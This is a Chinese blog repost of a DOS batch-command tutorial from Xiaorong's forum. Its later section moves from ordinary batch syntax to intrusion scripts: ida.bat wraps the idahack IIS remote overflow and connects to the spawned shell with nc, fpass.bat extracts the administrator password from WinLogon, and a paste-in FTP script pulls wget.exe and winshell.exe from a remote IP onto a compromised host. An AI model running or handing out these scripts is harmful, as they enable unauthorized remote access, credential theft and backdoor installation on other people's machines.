在小榕的论坛看的一篇关于DOS批处理命令的文章
文章结构
1. 所有内置命令的帮助信息
2. 环境变量的概念
3. 内置的特殊符号(实际使用中间注意避开)
4. 简单批处理文件概念
5. 附件1 tmp.txt
6. 附件2 sample.bat
######################################################################
1. 所有内置命令的帮助信息
######################################################################
ver
cmd /?
set /?
rem /?
if /?
echo /?
goto /?
for /?
shift /?
call /?
其他需要的常用命令
type /?
find /?
findstr /?
copy /?
______________________________________________________________________
下面将所有上面的帮助输出到一个文件
echo ver >tmp.txt
ver >>tmp.txt
echo cmd /? >>tmp.txt
cmd /? >>tmp.txt
echo rem /? >>tmp.txt
rem /? >>tmp.txt
echo if /? >>tmp.txt
if /? >>tmp.txt
echo goto /? >>tmp.txt
goto /? >>tmp.txt
echo for /? >>tmp.txt
for /? >>tmp.txt
echo shift /? >>tmp.txt
shift /? >>tmp.txt
echo call /? >>tmp.txt
call /? >>tmp.txt
echo type /? >>tmp.txt
type /? >>tmp.txt
echo find /? >>tmp.txt
find /? >>tmp.txt
echo findstr /? >>tmp.txt
findstr /? >>tmp.txt
echo copy /? >>tmp.txt
copy /? >>tmp.txt
type tmp.txt
______________________________________________________
######################################################################
2. 环境变量的概念
######################################################################
_____________________________________________________________________________
C:/Program Files>set
ALLUSERSPROFILE=C:/Documents and Settings/All Users
CommonProgramFiles=C:/Program Files/Common Files
COMPUTERNAME=FIRST
ComSpec=C:/WINNT/system32/cmd.exe
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:/WINNT/system32/os2/dll;
Path=C:/WINNT/system32;C:/WINNT;C:/WINNT/system32/WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0605
ProgramFiles=C:/Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:/WINNT
TEMP=C:/WINNT/TEMP
TMP=C:/WINNT/TEMP
USERPROFILE=C:/Documents and Settings/Default User
windir=C:/WINNT
_____________________________________________________________________________
path: 表示可执行程序的搜索路径. 我的建议是你把你的程序copy 到
%windir%/system32/. 这个目录里面. 一般就可以自动搜索到.
语法: copy mychenxu.exe %windir%/system32/.
使用点(.) 便于一目了然
对环境变量的引用使用(英文模式,半角)双引号
%windir% 变量
%%windir%% 二次变量引用.
我们常用的还有
%temp% 临时文件目录
%windir% 系统目录
%errorlevel% 退出代码
输出文件到临时文件目录里面.这样便于当前目录整洁.
对有空格的参数. 你应该学会使用双引号("") 来表示比如对porgram file文件夹操作
C:/>dir p*
C:/ 的目录
2000-09-02 11:47 2,164 PDOS.DEF
1999-01-03 00:47 <DIR> Program Files
1 个文件 2,164 字节
1 个目录 1,505,997,824 可用字节
C:/>cd pro*
C:/Program Files>
C:/>
C:/>cd "Program Files"
C:/Program Files>
######################################################################
3. 内置的特殊符号(实际使用中间注意避开)
######################################################################
微软里面内置了下列字符不能够在创建的文件名中间使用
con nul aux / / │ ││ && ^ > < *
You can use most characters as variable values, including white space. If you use the special characters <, >, │, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples:
(大意: 要么你使用^作为前导字符表示.或者就只有使用双引号""了)
To create the variable value new&name, type:
set varname=new^&name
To create the variable value "new&name", type:
set varname="new&name"
The ampersand (&), pipe (│), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments.
find "Pacific Rim" < trade.txt > nwtrade.txt
IF EXIST filename. (del filename.) ELSE echo filename. missing
> 创建一个文件
>> 追加到一个文件后面
@ 前缀字符.表示执行时本行在cmd里面不显示, 可以使用 echo off关闭显示
^ 对特殊符号( > < &)的前导字符. 第一个只是显示aaa 第二个输出文件bbb
echo 123456 ^> aaa
echo 1231231 > bbb
() 包含命令
(echo aa & echo bb)
, 和空格一样的缺省分隔符号.
; 注释,表示后面为注释
: 标号作用
│ 管道操作
& Usage:第一条命令 & 第二条命令 [& 第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
dir c:/*.exe & dir d:/*.exe & dir e:/*.exe
&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...]
当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;
││ Usage:第一条命令 ││ 第二条命令 [││ 第三条命令...]
当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
常用语法格式
IF [NOT] ERRORLEVEL number command para1 para2
IF [NOT] string1==string2 command para1 para2
IF [NOT] EXIST filename command para1 para2
IF EXIST filename command para1 para2
IF NOT EXIST filename command para1 para2
IF "%1"=="" goto END
IF "%1"=="net" goto NET
IF NOT "%2"=="net" goto OTHER
IF ERRORLEVEL 1 command para1 para2
IF NOT ERRORLEVEL 1 command para1 para2
FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k
按照字母顺序 ijklmnopq依次取参数.
eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
######################################################################
4. 简单批处理文件概念
######################################################################
echo This is test > a.txt
type a.txt
echo This is test 11111 >> a.txt
type a.txt
echo This is test 22222 > a.txt
type a.txt
第二个echo是追加
第三个echo将清空a.txt 重新创建 a.txt
netstat -n │ find "3389"
这个将要列出所有连接3389的用户的ip.
________________test.bat___________________________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem 不显示注释语句,本行显示
@rem 不显示注释语句,本行不显示
@if exist %windir%/system32/find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)
@if exist %windir%/system32/fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)
___________________________________________________________________________
下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的.
___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%/system32/idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%/system32/nc.exe echo "ERROR: dont find nc.exe"
@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2
tart
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%/_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%/_tmp
@find "good luck" %temp%/_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END
P2
@idahack.exe %1 80 %2 99 %temp%/_tmp
@type %temp%/_tmp
@find "good luck" %temp%/_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)
:END
_____________________ida.bat__END_________________________________
下面我们再来第二个文件.就是得到administrator的口令.
大多数人说得不到.其实是自己的没有输入正确的信息.
___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%/system32/findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%/system32/pulist.exe echo "ERROR: dont find pulist.exe"
@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%/_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%/_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%/_findpass.txt
@goto END
:USAGE
@pulist.exe >%temp%/_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%/_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"
:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________
还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win)
依次在窗口输入下面的东西. 当然了也可以全部拷贝.Ctrl+V过去. 然后就等待吧!!
echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w
在小榕的论坛看的一篇关于DOS批处理命令的文章相关推荐
- 大马小马问题就看这一篇
大马小马问题就看这一篇 public class Horse {public static void horseComposition() {for (int a = 1; a < 33; a+ ...
- 小程序 getphonenumber_小程序入门,看这一篇就够了!
文章为实战中踩坑经历,以及解决方案.同时是自己的一个项目回顾,在这里分享给大家,希望能帮助到大家.文章内代码需要左右滑动噢~ 登录授权 授权(基本信息,手机号码 )必须使用小程序原生的的button组 ...
- 看了几篇关于失败 成功 爱 的文章跟大家分享
没有失败的成功者,只有成功的失败者.没有失败,只有失败者. 我们是群懦夫 文/刘侠风 这里才是文章的地址,写的跟下面不太一样,建议看这个链接中的http://www.doc88.com/p-69995 ...
- 17万字 JUC 看这一篇就够了(三) (精华)
今天我们继续来学习Java并发编程 Juc框架 ,把剩余部分学习完 17万字 JUC 看这一篇就够了(一) (精华) 17万字 JUC 看这一篇就够了(二) (精华) 文章目录 非公原理 加锁 解锁 ...
- 最新WordPress微信小程序社区论坛源码多端应用
WordPress多端应用 WordPress作为后端生成多端小程序.快应用及APP,可用于资讯.新闻.博客.企业官网等 后端 使用开源博客建站系统wordpress和微慕小程序开源版插件 前端使用u ...
- 一个量化的网络游戏基础理论(草稿)——by 小榕^_^
一个量化的网络游戏基础理论(草稿) by 小榕 2005-5-16 at 哈尔滨理工大学7公寓723 引子 "游戏的可玩性" 忘了哪儿本书上写着"游戏 ...
- 基于微信小程序校内论坛系统设计与实现.rar(含毕业设计论文+数据库文件+源码+答辩ppt模板)
摘要:论坛作为一种新的生活上方式,工作方式和学习方式已经被大众所接受.并且在改变着人们的网络社交方式.随着越来越多的人在写论坛,论坛也正在影响着我们的生活.因此,开发一款简洁而功能强大的论坛系统,将来 ...
- 阿拉丁微信小程序创新论坛“上海站”成功举办 携多位业界专家探讨小程序创投机会...
1月15日下午,阿拉丁在上海长宁区明基广场国际会议室成功举办小程序创新论坛第三站-上海站.小程序从1月9号正式上线到现在已经过去近一周的时间了,这段时间里关于小程序的话题从未中断过.小程序的性感似乎被 ...
- 那些中国式家庭的小烦恼,我看用AI来解决就“都挺好” | 技术头条
戳蓝字"CSDN云计算"关注我们哦! 技术头条:干货.简洁.多维全面.更多云计算精华知识尽在眼前,get要点.solve难题,统统不在话下! 转自:趣味科技v 今天,又是<都 ...
- 云小课|想实现资源全自动备份?看完这篇秘籍,不再蕉绿~
阅识风云是华为云信息大咖,擅长将复杂信息多元化呈现,其出品的一张图(云图说).深入浅出的博文(云小课)或短视频(云视厅)总有一款能让您快速上手华为云.更多精彩内容请单击此处. 摘要:在给备份系统设置& ...
最新文章
- oracle数据库动态与静态注册
- 卷积神经网络CNN总结
- html如何找寻vue文件,如何预览vue文件
- open,write,read与fopen,fwrite,fread的区别
- 中文路径_中文分词的原理、方法与工具
- 五大板块(1)—— 数组的定义,赋值与应用
- 数据库mysql中贴换函数_关于一个自定义MYSQL函数,实现点击链接后,在数据库里改变数据的问题。...
- Android Studio 2.3的各种新增疑难杂症
- mysql命令的依赖库_3.EZMM工程(常用shell命令,及需要用到的基本依赖库)
- Python自动发送邮件提示:smtplib.SMTPServerDisconnected: please run connect() first
- B/S、C/S架构与视频对话技术
- android 左移动画_android 动画Animation之TranslateAnimation移动
- python在医学领域应用 课程_《Python程序设计与应用》在线课程使用说明
- PHP excel导出 表格 ,带图片
- 你知道中国历届奥运会中获得了多少金牌吗?
- 电力物联网大数据平台架构及应用
- 使用unity3d 接入anySDK的总结2
- Kotlin的协程:挂起函数
- petalinux 1144文档 安装流程
- elasticsearch - 节点、集群分片及副本、CRUD
热门文章
- Snagit 2019 for Mac(最好用的截图软件)v2019.1.11汉化版 MacOS 11 Big Sur支持
- shell 日期格式化输出
- javascript中for循环里面套定时器,始终打印结束值原因
- 如何使用Guitar Pro在乐谱播放时切换效果器音色?
- 滴滴宣布架构大调整,强调安全第一
- Java虚拟机(三)垃圾标记算法与Java对象的生命周期
- Apache-ActiveMQ消息队列 — HelloWorld实例
- I/O多路复用之select
- 第13章 Swing程序组件----常用布局管理器
- 获取GridView控件总列数